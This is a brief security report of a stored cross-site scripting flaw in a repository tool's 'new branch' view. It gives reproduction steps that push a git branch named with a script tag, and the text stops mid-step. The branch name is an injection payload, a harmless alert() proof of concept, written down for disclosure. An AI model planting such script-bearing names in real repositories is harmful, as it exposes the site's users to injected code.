Cross-site Scripting (XSS) vulnerability in repository "new branch" view

This vulnerability was reported by a customer via the security@ email address.

To exploit:

Create a new branch from the command line and push it to the repo:

$ git checkout -b '<script>alert();</script>'
Switched to a new branch '<script>alert();</script>'
$ git push origin '<script>alert();</script>'

Now browse to the repo and try to create a new branch: